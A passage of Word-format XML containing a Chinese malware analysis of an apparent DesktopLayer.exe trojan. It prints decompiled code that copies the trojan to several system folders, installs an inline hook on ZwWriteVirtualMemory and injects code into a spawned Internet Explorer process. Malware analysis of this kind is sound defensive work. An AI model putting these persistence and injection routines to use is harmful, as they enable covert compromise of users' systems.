        <w:t>void __usercall __noreturn start(int a1@&lt;eax&gt;, char *a2@&lt;edx&gt;, int a3@&lt;ecx&gt;, unsigned int a4@&lt;ebp&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EAC" w:rsidRDefault="00836EAC" w:rsidP="00836EAC">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EAC" w:rsidRDefault="00836EAC" w:rsidP="00836EAC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>….</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍然在修复导入表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  if ( checkbrowserexist("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 0x400u) == 1 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v4 = createmutex("KyUffThOkYwRRtgPP");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ( v4 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  destroymutex(v4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  v4 = HANDLE_FLAG_INHERIT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ( v4 == HANDLE_FLAG_INHERIT )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  v5 = GetModuleFileNameA(0, selffile, 0x104u);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  makecstring((BYTE *)selffile, v5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  if ( CopyAndRunTrojan(selffile) == 1 )</w:t>
      </w:r>
      <w:r w:rsidR="0091775D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0091775D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传播自身到以下路径：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>%CommonProgramFiles%</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>%HOMEDRIVE%%HOMEPATH%/Microsoft/DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>%APPDATA%/Microsoft/DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>//%SYSTEM%</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>/Microsoft/DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>//%TMP%</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>/Microsoft/DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="0091775D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>%ProgramFiles%/Microsoft/DesktopLayer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ExitProcess(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  if ( GetNtdllFunction() == 1 )</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现获取函数地址，</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:t>以便</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给注入到</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidR="004562F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的木马使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>hookZwWriteVirtualMemory();</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里没有直接</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inline hook</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点，</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:t>而是</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳了</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="006A2A2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条指令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9388C" w:rsidRDefault="000D141A" w:rsidP="000D14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reateProcess((LPSTR)"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="00C9388C" w:rsidP="00C9388C">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过上下逻辑可知</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9388C">
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:r w:rsidR="000D141A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidR="000D141A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NtWriteVirtualMemory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>unhookZwWriteVirtualMemory();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D141A" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ExitProcess(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EAC" w:rsidRDefault="000D141A" w:rsidP="000D141A">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00836EAC">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EAC" w:rsidRDefault="00836EAC" w:rsidP="00836EAC"/>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>int __stdcall makeinlinehook(LPVOID procaddr, LPVOID hookaddr, int a4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">  if ( VirtualProtect(procaddr, 0xAu, 0x40u, &amp;flOldProtect) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    v3 = skipninst(procaddr, 5u);</w:t>
      </w:r>
      <w:r w:rsidR="00907539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00907539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现了小型的</w:t>
      </w:r>
      <w:r w:rsidR="004E74EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编</w:t>
      </w:r>
      <w:r w:rsidR="00907539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令长度引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    hookoff = v3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    dwSize = v3 + 10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    shell = VirtualAlloc(0, v3 + 10, 0x1000u, 0x40u);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    if ( shell )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      v12 = shell;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)shell = procaddr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *((_BYTE *)shell + 4) = hookoff;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      v5 = (int)shell + 5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      memcpy(procaddr, (char *)shell + 5, hookoff);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      v6 = hookoff + v5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)v6 = 0xE9u;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)(v6 + 1) = (_BYTE *)procaddr - (_BYTE *)v12 - 10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)procaddr = 0xE9u;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)((char *)procaddr + 1) = (_BYTE *)hookaddr - (_BYTE *)procaddr - 5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)a4 = (char *)v12 + 5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      VirtualProtect(v12, dwSize, flOldProtect, &amp;v10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">      v9 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">    VirtualProtect(procaddr, 0xAu, flOldProtect, &amp;v10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:r>
        <w:t xml:space="preserve">  return v9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6462" w:rsidRDefault="001A6462" w:rsidP="001A6462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091775D" w:rsidRDefault="0091775D" w:rsidP="00836EAC">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我自己做了个实验，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也确实触发了</w:t>
      </w:r>
      <w:r w:rsidRPr="0091775D">
        <w:t>NtWriteVirtualMemory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目标句柄确实是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，所以重点在于挂钩函数的分析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t>// write access to const memory has been detected, the output may be wrong!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t>__int64 __stdcall new_ZwWriteVirtualMemory(HANDLE hProcess, PVOID BaseAddress, PVOID Buffer, int NumberOfBytesToWrite, int *NumberOfBytesWritten)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  __int64 v5; // rax@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  char *v6; // eax@3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  LONGLONG v7; // kr00_8@4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  __int64 v9; // [sp-20h] [bp-28h]@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  SIZE_T NumberOfBytesWrittena; // [sp+0h] [bp-8h]@5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  DWORD oldpro; // [sp+4h] [bp-4h]@5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842"/>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  LODWORD(v5) = old_ZwWriteVirtualMemory(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">                  hProcess,                     // here is IE process id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">                  BaseAddress,</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//some address in IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">                  Buffer,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">                  NumberOfBytesToWrite,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">                  NumberOfBytesWritten);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  v9 = v5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  if ( hProcess != (HANDLE)-1 &amp;&amp; !ieentry )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007843EF" w:rsidRDefault="00A25842" w:rsidP="007843EF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>v6 = GetEntryPointForProcess(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007843EF" w:rsidRDefault="009F76AE" w:rsidP="007843EF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009F76AE">
        <w:t>ZwQueryInformationProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ImageBase</w:t>
      </w:r>
      <w:r w:rsidR="007843EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，之后解析内存</w:t>
      </w:r>
      <w:r w:rsidR="007843EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidR="007843EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到入口点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">    if ( v6 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      dword_40DFA3 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      ieentry = v6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      v7 = </w:t>
      </w:r>
      <w:r w:rsidR="006B7849">
        <w:t>Modify</w:t>
      </w:r>
      <w:r>
        <w:t>Ie(hProcess, &amp;injectcode, 0x9800);</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将重要数据</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0043628E" w:rsidRPr="0043628E">
        <w:t>INJECTSTR</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和函数注入到目标进程，</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:t>见</w:t>
      </w:r>
      <w:r w:rsidR="0043628E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidR="005251B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      ie_inject_d = HIDWORD(v7);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      ie_inject_f = v7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25842" w:rsidRDefault="00A25842" w:rsidP="00A25842">
      <w:r>
        <w:t xml:space="preserve">      if ( ie_inject_f )</w:t>
      </w:r>
    </w:p>
